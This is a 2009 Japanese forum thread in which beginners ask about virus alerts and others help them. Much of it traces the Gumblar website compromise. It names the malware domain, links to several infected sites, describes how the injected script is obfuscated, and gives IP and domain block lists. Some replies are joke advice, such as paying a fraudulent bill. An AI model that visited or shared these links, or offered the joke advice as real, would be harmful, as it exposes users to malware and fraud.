850名無しさん@お腹いっぱい。sage2009/04/28(火) 17:25:46
↑の続きです

例・通常
・2chを開く        IEXPLORE.EXE   65.000KB
・ミギクリ別ウインドウで開く  IEXPLORE.EXE   75.000KB
・ミギクリ別ウインドウで開く(その2)  IEXPLORE.EXE   85.000KB

・2chを開く        IEXPLORE.EXE   65.000KB
・URLクリック         IEXPLORE.EXE   65.000KB
・URLさらにクリック  IEXPLORE.EXE   70.000KB

今現在
・2chを開く        IEXPLORE.EXE   65.000KB
・ミギクリ別ウインドウで開く  IEXPLORE.EXE   150.000KB
・ミギクリ別ウインドウで開く(その2)  IEXPLORE.EXE   400.000KB

・2chを開く        IEXPLORE.EXE   65.000KB
・URLクリック         IEXPLORE.EXE   150.000KB
・URLさらにクリック  IEXPLORE.EXE   400.000KB

ちなみに数十分もすると2000.000KBとか行きます。勿論、ここ数日だけです

明らかに消費量がおかしいのですが(PFとIEの消費量)何か考えられる原因はありますか?
たしかに動作も重いような気もするのですが…

スペック
Core 2 Duo プロセッサー T8300 4GB(2GBx2) GeForce 8400M GS 128MB
851名無しさん@お腹いっぱい。sage2009/04/28(火) 23:50:13
【使用OS】 「Vista Ultimate」
【Microsoft Update(MU)の状態】 「自動(出たらすぐに導入)」
【使用セキュリティソフトとバージョン】 「OneCare」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【スパイウェア対策ソフト】 「Onecare」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「yes」
【ルータの有無】 「有り」

あらゆるプログラムを起動する歳にOneCareが「インターネットへの接続を許可しますか」というポップアップを出すようになりました。
インターネットにアクセスしないであろうソフトを起動しても出てきます。

何かのウィルスかワームで、レジストリをいじってあらゆるソフトの起動と同時に活動するやつがいた記憶があるのですが、
そいつにやられているのでしょうか?
852八頭 ◆YAGApwSaEw sage2009/04/28(火) 23:58:12
>>849
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2008」  ← 2009の方が軽いよ

★最新版 Norton Internet Security 2009 への無償アップグレード
http://pc11.2ch.net/test/read.cgi/sec/1239086455/

>ieの使用メモリ量もありえない量に増大
これはブラウザの設定&有効になっているアドオンの数&サービスの稼働状況 に起因するものだと思う
キャプチャ画像をセキュリティ初心者質問スレッドpart118 にUPすれば◆N9P3SuvBPoなどがアドバイスしてくれるだろう
853八頭 ◆YAGApwSaEw sage2009/04/29(水) 00:14:18
>>851
http://pc11.2ch.net/test/read.cgi/sec/1239086455/l50
・「a-squared Free 4.0」
・「Avira AntiVir Personal - FREE Antivirus, Version 8 (*9は非常駐化×)」

この2つをインストール > Update > フルスキャン して感染があるかどうか?調べてみるといいよ
854名無しさん@お腹いっぱい。sage2009/04/29(水) 02:28:53
OneCareにはソフトウェアエクスプローラ的なものは無かったかい?
あれば手っ取り早く調べられるんだが
855851sage2009/04/29(水) 10:32:45
>854
OneCareにはないですね。WindowsDeffender側のを起動させてみたんですが、とくに怪しいようなのはなかったてす。
探し方のコツとかありますか?
856八頭 ◆YAGApwSaEw sage2009/04/29(水) 14:26:18
「Process Explorer」や「Process Monitor」のことかな?
次々とexeファイルに感染を拡げるタイプのウイルスには無意味
857名無しさん@お腹いっぱい。sage2009/04/29(水) 22:01:03
>>852
ありがとうございます
とりあえず2009にして見ます(どうも2007だったようです(汗

>ブラウザの設定&有効になっているアドオンの数&サービスの稼働状況 に起因する

分からないでもないんですが、その設定が突然変わったりすることはあるんでしょうか?
858名無しさん@お腹いっぱい。sage2009/04/29(水) 23:50:32
>>852
なぜか2009に更新したら収まった気がします
ありがとうございました

数日様子みておかしいようでしたらまたきます
859名無しさん@お腹いっぱい。sage2009/04/30(木) 02:53:25
いまでもPCの知識に乏しいのですが、始めてすぐの頃にファイルをDLしたらスクリーンセーバーで
なんとなく使っていたんですが、".scr"という拡張子の場合偽装ウィルスである可能性が高いと聞いて
自分が開いたファイルはウィルスだったのか気になっています
偽装ウイルスの場合、中身はウイルスだけでデスクトップで普通に使用できるスクリーンセーバーは入っていないものなのでしょうか
p2pはやっておらず、セキュリティソフトのウイルス検索では何も発見されていません
どうかみなさんのご意見お聞かせください
860名無しさん@お腹いっぱい。sage2009/04/30(木) 03:57:31
>>859
自分で調べろ
「VirusTotal.com」 (37社のスキャナでのファイルスキャンサービス *SSLにチェックして送信 *圧縮ファイルの状態でOK)
861名無しさん@お腹いっぱい。sage2009/04/30(木) 20:10:56
>>859
scrはスクリーンセーバーの拡張子。(まあ中身はexeと同じ)
だからスクリーンセーバのプログラムの拡張子が、scrなのは当たり前。
8628592009/05/01(金) 00:09:03
>>860>>861
さっきオキャンしてもらったら、ウィルス反応はありませんでした
1つのソフトでチェックするよりも少し安心しました
ありがとうございました
863名無しさん@お腹いっぱい。sage2009/05/01(金) 00:24:05

ageてすみません
864名無しさん@お腹いっぱい。sage2009/05/01(金) 09:05:32
【使用OS】 「VISTAHP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてる」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なってる」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Adware-GameSpyArcade」
毎回スキャンのたびに表示されるからウイルスとかじゃないと思ってるんですが、
毎回隔離するのも面倒なので、検出されたものが危険なのか知りたいです。
一応ぐぐったり調べましたが具体的な回答が見つからないため質問に来ました。
865名無しさん@お腹いっぱい。sage2009/05/01(金) 10:14:14
>>864
グーグル検索→一番上
に具体的にあったが
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gamespyarcade.html

レジストリも削除が必要
866名無しさん@お腹いっぱい。sage2009/05/01(金) 10:18:29
>>865
ありがとうございます。
しかしPage Not Found
867名無しさん@お腹いっぱい。sage2009/05/01(金) 12:59:57
>>864
GameSpy Arcadeに関する何か使ってませんか?
GameSpy ArcadeはGameSpy Industries社製の汎用マッチメーキングソフトであり、

GameSpyArcade自体がアドウエアですので、必ず検出されます。(持っていれば
868名無しさん@お腹いっぱい。2009/05/01(金) 14:04:24
http://crusherfactory.net/~yas_/000256.php
このサイトavgでウィルスの反応が出たけど、どの程度やばい、
後何か検査とかしたほうがいい?
869名無しさん@お腹いっぱい。sage2009/05/01(金) 14:20:16
そういうのを直リンするとかバカなの?
870名無しさん@お腹いっぱい。sage2009/05/01(金) 14:30:34
踏んだら危ないものを普通に貼るのはルール違反だぞ?被害者が増えたらどうする。
どうしても貼る場合はきちんと危険だってことを明記するのが礼儀。
871名無しさん@お腹いっぱい。sage2009/05/01(金) 14:35:44
とりあえずaguseだとウイルス反応はないな
872名無しさん@お腹いっぱい。sage2009/05/01(金) 15:00:45
ソースをコピペしてVirusTotalにあげたが
AntiVir , Authentium , Avast , F-Prot , GData , McAfee-GW-Edition , Norman
で反応した。

検出したのをググってみたが、普通に常駐で反応し削除したのであれば問題ないかと。
心配なら、フルスキャンすればいい。
873名無しさん@お腹いっぱい。sage2009/05/01(金) 15:04:34
>>868
セキュリティソフト何いれてるの?

心配なら他のオンラインスキャンもやってみなよ
874名無しさん@お腹いっぱい。2009/05/01(金) 15:27:33
>>870
一応ウィルス反応あったって欠いたけど、h抜きはするべきだったね。
>>873
avastだよ。

>>872
削除できませんでしたと出たので、どうかと思ったけどこれはavaスレで聞くよ。
875名無しさん@お腹いっぱい。sage2009/05/02(土) 00:17:54
>>867
結構FPSゲームやるんですがそれですかね
ウイルスじゃないなら信用を押して検出しないようにしたいのでそこらへん教えてほしいです
レジストリから削除しちゃったんですけど、またプレイしたら入るんでしょうし
876名無しさん@お腹いっぱい。2009/05/02(土) 18:43:02
さっきYahoo!で「ウェルネス」ってサイトを開こうとしたらavastが反応しました。医療や介護関係のまじめなサイトで社会に貢献しているサイトなのですが感染してるのでしょうか?
電話したのですが休みのようです。
他のソフトでも反応がでたら休み開けに再度、連絡してみようと思ってます。

877名無しさん@お腹いっぱい。sage2009/05/02(土) 18:52:03

そのアドレスを「ht」を省いてここに書いてくれ。
それと、サイト自体が改ざんされてマルウェア仕込まれるなんてよくあること。
878名無しさん@お腹いっぱい。sage2009/05/02(土) 19:04:16
>>877

つtp://www.wellness.co.jp/

です。ヨロシクお願いします。
879 ◆N9P3SuvBPo sage2009/05/02(土) 20:07:05
>878
そのサイトのソース(問題と思われるコードだけ)をメモ帳にコピペしたものを、
virustotalに投げて見ました。3社が反応してくれました。(以下URL参照)

ttp://www.virustotal.com/jp/analisis/4c1586f687ca86a674d0d7092f475fe3
880名無しさん@お腹いっぱい。sage2009/05/02(土) 20:16:28
そのサイトには、どっかの悪質なサイトにリダイレクトするスクリプトが仕込まれてるってさ。
砂箱経由でFirefoxからアクセスしたけど、特に何もなかったが・・・
881876です。 ◆reuJ2vDwKA sage2009/05/02(土) 20:47:31
>>879
>>880

ありがとうございます。乗りかかった船です。休み開けに管理者に連絡してみます。改ざんだとしたら許せないですね。
882名無しさん@お腹いっぱい。sage2009/05/02(土) 21:38:16
>>878-881
それ、変なスクリプト仕込まれてて、今検出可否スレで話題になってる gumblar.cn に飛ばされるぞ。
 http://pc11.2ch.net/test/read.cgi/sec/1235459712/690

VirtualPCで踏んでみたけど、俺の所はマルウェアのid2とid3が落ちてきた。

てか、genoの時と同じで、今の所スルーするセキュリティソフトが多いんで、マジでアクセスしない方が良い。
883 ◆N9P3SuvBPo sage2009/05/02(土) 22:01:06
>882
その変なスクリプトというのが『@や英数字』なんですよね。
俺の環境ではIE直踏みでも大丈夫だけど、素人は興味本位でアクセスしない方が良い。
884882sage2009/05/02(土) 22:17:09
>>883
そう。Javascriptのreplaceとunescapeを使って難読化されている。

@を%に置き換えてunescape関数を実行すると、元のスクリプトが出てくる。(普段はブラウザが勝手にやってる)
※ 俺はJavascriptに詳しい訳じゃないので、逆にその程度しかわからんが。

Firefox+Noscriptなら許可しない限り実行されないから問題ないけど、IEだとごく普通に勝手に実行されてマルウェアが落ちてくる。
Acrobat Readerや Flash Playerが古いままだと、現時点ではスルーするセキュリティソフトがほとんどだから、この時点でアウト。
885名無しさん@お腹いっぱい。sage2009/05/02(土) 22:31:25
あー、気持ち悪いからOS入れ直してくるわ。
886名無しさん@お腹いっぱい。sage2009/05/02(土) 22:40:07
Firefox+Noscriptを使ってはいるけど
ウェルネスなんかの真面目なサイトだと普段覗いてれば
許可出してしまいがちだから怖いなぁ
887 ◆N9P3SuvBPo sage2009/05/02(土) 22:54:19
>884
>@を%に置き換えて
頑張って手動でやってみようとしたけど
海外のエロサイトリンクに***%2f***というのがよく出るので、@2fが / だということしか分かりませんでした。

>886
極普通の真面目なサイトが不正アクセス受けて改ざんされて
安全なサイトだからつい許可してしまったら感染…
俺らは一体何を信用すればいいの?
という事態に成りかねないですよね。
888882sage2009/05/02(土) 23:29:26
>>887
手動でやるのは無理なので、こういうサイトを利用するのでし。
 ttp://www.broadband-xp.com/hidesource/escape.html

今回のだと、ソースの中のunescapeの部分に注目して、あとreplase部分から@→%の置換があることに当たりを付けて、
1) unescape関数の中身('@〜'まで)をテキストエディタにコピー
2) エディタ上で@を%に置換
3) 置換後のテキストを、上記のサイトの右側の欄に貼り付け
4) unescape関数でデコード のボタンを押す

そうすると、左側に元のスクリプトが表示されます。今回のだと、前の方でOS判定をやって、
最後の所で src=//gumblar.cn/〜 でマルウェアを落とすようになっていることがわかるのです。
889名無しさん@お腹いっぱい。sage2009/05/02(土) 23:43:45
idがJScriptエンジンのバージョンだって事は分かった。
ID付けてアクセスしたらスクリプトが落ちてきたよ。

ttp://www.virustotal.com/jp/analisis/e90aad75500f07482cb4ef925a55f9cc
890 ◆N9P3SuvBPo sage2009/05/03(日) 00:00:18
>888
やってみたところ、ちゃんとできました。
@のところを%に置き換える作業がめんどくさかったですけどね。
勉強になります…
891名無しさん@お腹いっぱい。sage2009/05/03(日) 08:07:57
>>886
俺もFirefox+Noscript使ってる。
面倒だけど許可したい場合も毎回一時的な許可に留めた方が安全か。

つーか普通のサイトで感染するなんてなんつー世の中だよ
892名無しさん@お腹いっぱい。sage2009/05/03(日) 08:17:59
>>891
毎回許可にしようとも、そのときに改竄されてるとアウツなのよね。
まともなサイトが改竄されてるともうどうしようもないよね…。
893882sage2009/05/03(日) 10:35:23
事後情報です。

検出可否スレにも書きましたが、gumblar.cnが、Googleの攻撃サイトに登録されました。
GoogleのSafe Browsing APIを使用しているブラウザ(Firefoxやchromeなど)では、アクセスブロック(攻撃サイトの表示)が行われるようになっています。

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/

2009年5月3日 10:20時点で、既に308個のドメインを感染させているそうですので、皆様も注意お願いします。
894名無しさん@お腹いっぱい。sage2009/05/03(日) 11:00:37
乙。

ライセンスの電話認証めんどくさ。
895名無しさん@お腹いっぱい。sage2009/05/03(日) 12:31:38
Firefoxで踏んでみたけど、今んとこ問題ない
896名無しさん@お腹いっぱい。2009/05/03(日) 12:34:51
危険IPのブロック(Firewall登録/IPベースのブロッカーの導入)

IDS/IPS/Firewall
BLOCK : 94.229.65.160 - 94.229.65.191

めんどくさいんで、まとめてブロック
BLOCK : 94.229.64.0/20 (94.229.64.0 - 94.229.79.255)

Browser/Hosts ブロック:
BLOCK : gumblar.cn
897名無しさん@お腹いっぱい。sage2009/05/03(日) 15:03:06
ありがとう。
うちのルータのIPフィルタはマスク長入れないといけないので
まとめてブロックは初心者としては有難いです。
898名無しさん@お腹いっぱい。sage2009/05/04(月) 00:33:02
http://www.freaksstore.com/

フリークスストアのサイト踏んだら
ノートン先生がトロイ検出したんだが…
899名無しさん@お腹いっぱい。sage2009/05/04(月) 00:44:46
>>898
>>878のと同じ。
900名無しさん@お腹いっぱい。sage2009/05/04(月) 00:49:00
>>899
サンクス
901名無しさん@お腹いっぱい。sage2009/05/04(月) 02:36:25
>>878,898
gumblar.cnの感染サイト追加。http://pc11.2ch.net/test/read.cgi/sec/1129098218/300 より転載

ttp://www●nenrei-hayami●net/

や、これはキリがないな。時間と共に増える一方だ。ちょうど連休中で管理者不在のサイトも多そうだし。
つか、genoの時も思ったけど、こいつら簡単に改竄されすぎじゃねえのかと...
902名無しさん@お腹いっぱい。sage2009/05/04(月) 06:05:12
せっかくの休日をウィルスでやられたんじゃたまったもんじゃないな
903名無しさん@お腹いっぱい。sage2009/05/04(月) 10:48:58
危険IPのブロック(Firewall登録/IPベースのブロッカーの導入)
現在のまとめ: 2009.05.03 予防措置も含めて

Host Flesh
58.65.232.0 - 58.65.239.255

Chunghwa Telecom Co.
61.219.39.0 - 61.219.39.255

CHINA RAILWAY TELECOMMUNICATIONS CENTER
61.235.117.0 - 61.235.117.255
61.237.236.0 - 61.237.236.255

XS4ALL Internet BV (zief.pl)
83.68.16.0 - 83.68.16.255

UK Dedicated Servers Limited
- (gumblar -- Russian )
94.229.64.0/20 (94.229.64.0 - 94.229.79.255)

ZLKON
94.247.2.0 - 94.247.3.255

CHINA UNICOM
211.90.0.0 - 211.97.255.255

LU-ROOT
212.117.160.0 - 212.117.191.255

CHINANET
218.90.0.0 - 218.94.255.255
904名無しさん@お腹いっぱい。sage2009/05/05(火) 01:05:12
http://ssupdater.com/modules/Forums/index.php?showtopic=2502
http://ssupdater.com/modules/Forums/index.php?showtopic=1810
http://ssupdater.com/modules/Forums/index.php?showtopic=3746
905 ◆N9P3SuvBPo sage2009/05/05(火) 01:21:04
>904
海外のアンチウイルスやアンチスパイウェアの検出ランキングです。
古いです。
906名無しさん@お腹いっぱい。sage2009/05/05(火) 06:14:46
すみません、質問です。
Symantec Security Checkを通したら
C:\WINDOWS\system32\Tools\Hide.exe は Adware.Gen に感染していると言われました。
これはどうすればいいでしょうか?
907名無しさん@お腹いっぱい。sage 2009/05/05(火) 07:44:51
マジレスですご返答お願いします。

アダルトサイトからの請求画面がパソコン上に出ます。消してもしつこく出てきます。
間違いなく架空請求です。何か止める方法はありますか?

宜しくお願いします。
908名無しさん@お腹いっぱい。sage2009/05/05(火) 07:52:14
請求どおり払う。
909名無しさん@お腹いっぱい。sage2009/05/05(火) 10:31:14
・SUPERAntiSpywareやmalwarebytes' anti-malwareを試してみる。
・OSクリーンインストール。
・窓からPCを投げる

910名無しさん@お腹いっぱい。sage 2009/05/05(火) 11:36:27
909さんはじめまして907です
手順を追って丁寧に教えてほしいです
お願いします
911名無しさん@お腹いっぱい。sage2009/05/05(火) 12:15:35
まずPCをシャットダウンします。
シャットダウンが完了したら、接続されている線を全て抜きます。
全て抜き終わったら窓を開け、下に人が居ないのを確認したら窓から勢いよく放り投げるます。
PCが落ちたのを確認したら近くの家電量販店に行き、適当なPCを買ってきます。
これで元通りになると思います。
912名無しさん@お腹いっぱい。sage2009/05/05(火) 21:24:30
explzを本サイトで落そうとして、ダウンロードをクリックしたら、アンチウィルスソフトがブロックした。
ウィルス入ってるのかなぁ。。。
913名無しさん@お腹いっぱい。sage2009/05/05(火) 22:09:44
>>912
DECLHA.EXEが誤検出されるけど無害
914名無しさん@お腹いっぱい。sage2009/05/05(火) 22:56:47
>>913
何が誤検出されてるか調べるのは、どうすればわかるの?
915名無しさん@お腹いっぱい。sage2009/05/05(火) 23:05:09
お使いのアンチウイルスソフトのスレで聞いてください
916名無しさん@お腹いっぱい。sage2009/05/06(水) 06:32:54
>>905
新しいのください
917名無しさん@お腹いっぱい。sage2009/05/06(水) 11:21:39
ttp://www.horseman-club.com
AVASTくんがトロイがいると怒ってます
例のヤツでしょうか
918名無しさん@お腹いっぱい。sage2009/05/06(水) 11:42:08
>>917
見てみましたが、その通りです。

そのページの中にあるswfobject.jsとimageReplace.jsの2つのファイルの中に、gumblar.cnへのリンクが埋め込まれています。

つーか、まだgumblar拡散してんのか...流石GW中、どこも管理者不在かねぇ。 ある意味明日が楽しみだな。
919 ◆N9P3SuvBPo sage2009/05/06(水) 11:46:20
>916
それは904に聞いてください。

>917
そのサイトのトップのソースをまるまるvirustotalに掛けて見たんですけど、
ひとつも検出できたソフトはありませんでした。
ちなみにそのサイトのどこでAvastが反応ありましたか?
920918sage2009/05/06(水) 11:52:54
>>919
>918の通り、そのページのソースそのものではなく、呼び出しているスクリプトファイルの中に埋め込まれています。

swfobject.jsとimageReplace.jsの2つをテキストエディタで開けば、毎度おなじみの難読化コードが出てきますよ。
921 ◆N9P3SuvBPo sage2009/05/06(水) 11:55:38
>918
>920
どおりでトップページに無いわけでした。
/imageReplace.jsや/swfobject.jsのソースを確認したところ、
問題のコードが下の部分にありました。
917すいません…
922名無しさん@お腹いっぱい。sage2009/05/06(水) 12:40:17
>>918
ありがとうございます
TOPページのソースを見てもちょっとわからなかったので納得です

普通の人は閲覧しないであろうサイトですが
ポイントサイトにリンクがあったので見ちゃった人多いかも…

>>921
いえいえ
923名無しさん@お腹いっぱい。sage2009/05/08(金) 20:53:36
どっかに、沢山ウィルスが置いてあるサイトってない?
924名無しさん@お腹いっぱい。sage2009/05/08(金) 22:28:53
>>923
eicarでも使っとけカス
925名無しさん@お腹いっぱい。2009/05/10(日) 02:34:38
緊急の対処法を教えてください。
昨日から今日にかけて、大量のMAILER_DAEMONを受信しました。
所有する独自ドメインで管理しているしているメールアドレスからどうやら発信しているようです。

xxx@mydomain.net

このxxxの部分が自分の管理していない見覚えのないアカウントになっています。
まだウイルスかは分からないですが、とりあえず緊急処置を教えていただけませんか?
スレチだったらごめんなさい。
926名無しさん@お腹いっぱい。sage2009/05/10(日) 03:23:03
一瞬、冷や汗がでましたが自己解決できました。
メールヘッダを調べたことろ、誰かが自分のアドレスを偽装して送信していたみたいです。
板汚してすいません。
927名無しさん@お腹いっぱい。sage2009/05/10(日) 12:21:35
こんな程度の奴がドメイン持つなよ…
928名無しさん@お腹いっぱい。sage2009/05/11(月) 10:17:37
>>867
何そのコピペ解答
有名な鯖ブラウザだろw
929名無しさん@お腹いっぱい。sage2009/05/13(水) 22:19:53
すいません、なんちゃってネットワーク管理者です。
社内のパソコンでウィルスが発生しました。

【使用セキュリティソフトとバージョン】「ウィルスバスター2007、2008、2009」
【Microsoft Update(MU)の状態】 「今年の4月までの状態でした」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】「Yes」

ウィルスバスターが「BKDR_SDBOT.CU」を検出、隔離したとメッセージが出ていて、ウィルスが感染
していたであろうUSBメモリも検索し隔離、その後フォーマットもしたのですが、違うPCで
利用したところ、そのPCのウィルスバスターもUSBメモリにウィルスが存在しているというメッセージを
出してしまいました。

どうしたら完全に削除することができるのでしょうか。
930名無しさん@お腹いっぱい。sage2009/05/13(水) 22:54:02
そのUSBメモリ捨てて新しいの買えよ
931名無しさん@お腹いっぱい。2009/05/14(木) 13:27:16
>>929
autorunを切れ

http://www.itmedia.co.jp/enterprise/articles/0902/26/news029.html
http://support.microsoft.com/kb/967715/ja
932名無しさん@お腹いっぱい。sage2009/05/14(木) 13:35:50
最近GENOウィルスの存在を知り、感染しているか心配です。

OSはVISTAを使っていて、まとめサイトではVISTAは大丈夫と記載はありますが、、、

VISTA感染の報告などあるのでしょうか?
933名無しさん@お腹いっぱい。sage2009/05/14(木) 20:33:03
スクリプトでNT5(2000、XP、2003)以外を蹴ってるが、
わざわざスクリプト解読してpdfやswfやexeを拾って実行すりゃ感染するんじゃね?
934名無しさん@お腹いっぱい。sage2009/05/14(木) 21:59:30
小林製薬の一部サイトが改ざん、閲覧者はウイルス感染の恐れ
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html
935名無しさん@お腹いっぱい。2009/05/16(土) 00:04:21
AVGで次のメッセージが出ました。
「Adware.CnsMinが検出されました」
どうすれば良いのでしょうか?




936名無しさん@お腹いっぱい。sage2009/05/16(土) 00:05:43
AVG Anti-Virus Version 86
http://pc11.2ch.net/test/read.cgi/sec/1240905473/
937名無しさん@お腹いっぱい。sage2009/05/18(月) 23:42:49
携帯電話からサイトを観覧した場合でも、やっぱり感染してしまうんでしょうか?
938名無しさん@お腹いっぱい。sage2009/05/19(火) 00:58:53
>>937
観覧ねwww
939名無しさん@お腹いっぱい。sage2009/05/19(火) 10:11:29
>>938
陛下に対してなんという口のききかた…
940名無しさん@お腹いっぱい。sage2009/05/20(水) 10:45:19
データを移すとき、USBメモリや外付けHDDなどで
ウィルスに感染するそうですね。
では、DVD−Rを使ってデータを移しても、
やっぱり感染のリスクはあるのでしょうか?
941名無しさん@お腹いっぱい。sage2009/05/20(水) 13:33:07
【使用OS】 「vista home premium sp1」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「カスペルスキー2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「常に最新」
【スパイウェア対策ソフト】  「カスペルスキー2009しか入れていません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常に最新」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「HEUR:Trojan-Downloader.Script.Generic
Windows Sidebar\Shared Gadgets\eBooks World.gadget\filpBook.js」
(半角が見当たらないので全角になってしまいました。すみません)

ウイルスに分類されており、駆除出来なかったのでファイルごと削除して再起動かけました
このウイルスについてググったところ海外サイトばかりひっかかり、
詳細が分からないので教えて下さい
942名無しさん@お腹いっぱい。sage2009/05/21(木) 09:33:15
サーバーのファイルに作った覚えのない
「hili2.php」ってのが作られてhtmlも改ざんされてるんだけど
詳細わかる人います?
943名無しさん@お腹いっぱい。sage2009/05/21(木) 09:48:16
「hifili2.php」だった
944名無しさん@お腹いっぱい。sage2009/05/21(木) 11:06:15
>>942
ttp://www29.atwiki.jp/geno/pages/15.html
945名無しさん@お腹いっぱい。2009/05/22(金) 22:05:46
hj-splitという動画ファイルを結合させるソフトをいつものように立ち上げましたところ
このようなメッセージが出まして立ち上がりませんでした。
the procedure entry point ioctlsocket could not be located in the dynamic link library wsock32.dll
ウィルスなのでしょうか?対策方法などわかりましたら、ご指導ください。
946名無しさん@お腹いっぱい。sage2009/05/23(土) 12:11:54
192.***.***.255はブロードキャストアドレスですよね?(192.***.***.1がルータのアドレス)
セキュリティソフトが接続先192.***.***.255、UDPポート138の通信を許可するのか聞いてきますが、
許可で問題ありませんよね?

947名無しさん@お腹いっぱい。2009/05/24(日) 12:37:35
SMVERI32.dll っていうウイルスなのかよく分からないものに感染した。。
SMCORPNAME Corporation 
って書いてあるが中国?のやつかもしれないが
このファイルがwuaulctやrundll32を頻繁に起動させて困っています
どなたかご存知の方がいらっしゃいましたら
対処法を教えてください
お願いします
948名無しさん@お腹いっぱい。sage2009/05/24(日) 13:35:44
なんで質問テンプレすら使えない奴ばっかりなんだろう。
949名無しさん@お腹いっぱい。2009/05/24(日) 14:25:00
質問用テンプレが回答者に一方的に都合が良くて質問者向けで無いからだろう
質問用テンプレを自分で全部埋められる人がここで聞く事なんか無いだろうさ
950名無しさん@お腹いっぱい。sage2009/05/24(日) 14:46:37
>>948
読んでない説に一票
見つけたウィルスが怖くてあっぱっぱー状態なんだろう。
でも、だからこそ >>1読んで出直し! と突っぱねるべきかと。
951名無しさん@お腹いっぱい。sage2009/05/24(日) 15:04:41
記載例は必要だぞ。
952名無しさん@お腹いっぱい。2009/05/24(日) 15:32:27
>>950
いやテンプレがあるのは知ってたが
原因が分かってるから駆除方法を知ってる人がいれば教えて欲しいんです
ググっても英語サイトが引っ掛かるだけで対処法も詳しくはのってないので
953名無しさん@お腹いっぱい。sage2009/05/24(日) 15:56:14
開き直りか
もう回答は無いと思え
954名無しさん@お腹いっぱい。sage2009/05/24(日) 16:37:09
>>952の言い分は
ちょっと過失で事故って車壊しちゃったんだけど、
状況とか詳しく説明もせずに、周りから援助もらったり修理用の保険金下りたりします?
てことだよな?
955 ◆N9P3SuvBPo sage2009/05/24(日) 18:04:33
原因分かってるのならご自身で対処できると思いますが…?
956名無しさん@お腹いっぱい。sage2009/05/25(月) 08:46:07
★質問用テンプレ★
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「最新です」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「ありません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ありません」
【ルータの有無】 「あります」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】

リカバリをした後Janeをダウンロードしようと思って
http://janesoft.net/janestyle/(Jane公式サイトです)へアクセスし、
ZIP版をダウンロードしたらノートンがトロイのウイルス警告を出しました、詳細は
http://safeweb.norton.com/report/show?url=ftp.vector.co.jpです。
ZIP版をダウンロードはしたのですが、解凍はしていないのと、ノートンで
フルスキャンをしても何も検出されませんでした。

警告を出されただけで、解凍していない&スキャンで何も検出されなかったら
問題は無いでしょうか?

よろしくお願いします。
957名無しさん@お腹いっぱい。sage2009/05/25(月) 14:06:08
Nortonスレで聞けよ
958名無しさん@お腹いっぱい。sage2009/05/25(月) 19:30:28
【使用OS】Windows Vista SP1
【Microsoft Update(MU)の状態】最新の状態
【使用セキュリティソフトとバージョン】ウイルスキラーゼロ(2009年版に更新済み)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】無し

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】

Backdoor.Win32.VB.epoという名前のウイルスが起動後に数分おきに常に駆除されています。
完全にウイルススキャンを行っても感染ファイルは発見されず、安全性のチェックをしても高いままです。
どうやら駆除しきれていないようなので、このままパソコンを使い続けるのは危険なように感じます。
完全に駆除するにはどうしたらよいのでしょうか?
よろしくお願いします。
959名無しさん@お腹いっぱい。sage2009/05/25(月) 20:29:25
>>958
クリンインスコしる
960名無しさん@お腹いっぱい。sage2009/05/25(月) 21:01:34
>>959
繰り返し質問ですみません。
クリーンインストールって、Vistaを再インストールするってことですか?

それとBackdoor.Win32.VB.epoはどんな悪影響を及ぼすウイルスなのでしょうか?
ググってみてもまともな解説のあるサイトをほとんど発見できなかったのですが…。
961お節介sage2009/05/25(月) 21:24:37
>>960
カスペのオンラインで駆除出来ると思うが万全を期すんだったら再インストール
962名無しさん@お腹いっぱい。sage2009/05/25(月) 21:34:13
>>960
だーかーらー
ウジウジ悩むくらいなら綺麗さっぱり消しちまえ
ついでにうぃるすきらぁも投げ捨てて別なワクチンを導入しろ
間違ってもキングとかセキュリティZEROみたいなジョークソフトを入れるなよ
963名無しさん@お腹いっぱい。sage2009/05/25(月) 21:35:35
>>960
キラーのスレでも同じようなこと言ってる人いたからキラーの問題じゃないか?
964名無しさん@お腹いっぱい。sage2009/05/25(月) 21:45:10
>>961-962
ありがとうございます。
まずはカスペにアクセスして駆除を試してみます。
駄目なら大事なデータを避難して再インストールします。
>>963
多分それは私だと思います。レスがつかなかったのでスレチかと思って…。
結果的にはマルチになってしまいましたね、すみません…。
965名無しさん@お腹いっぱい。sage2009/05/25(月) 22:30:08
まさかシステムの復元のバックアップフォルダってオチじゃないよな
966名無しさん@お腹いっぱい。2009/05/27(水) 17:31:38
C:\Documents and Settings\(ユーザー名)の中に「CHIAKO」というフォルダが出来ていました。
フォルダの中には「新しいフォルダ(8)」が入っていて、その中には何もありませんでした
プロパティで確認したところ0メガバイトでした。
自分家族はもちろんのこと知人にもCHIKAKOという名の人はいないのですが
勝手にこんなフォルダを作成するウイルスってあるのでしょうか?
967名無しさん@お腹いっぱい。sage2009/05/28(木) 06:53:26
>>966
誰かがその名前でPC使ったんじゃね?
968名無しさん@お腹いっぱい。2009/05/29(金) 23:34:03
【使用OS】 「vista」
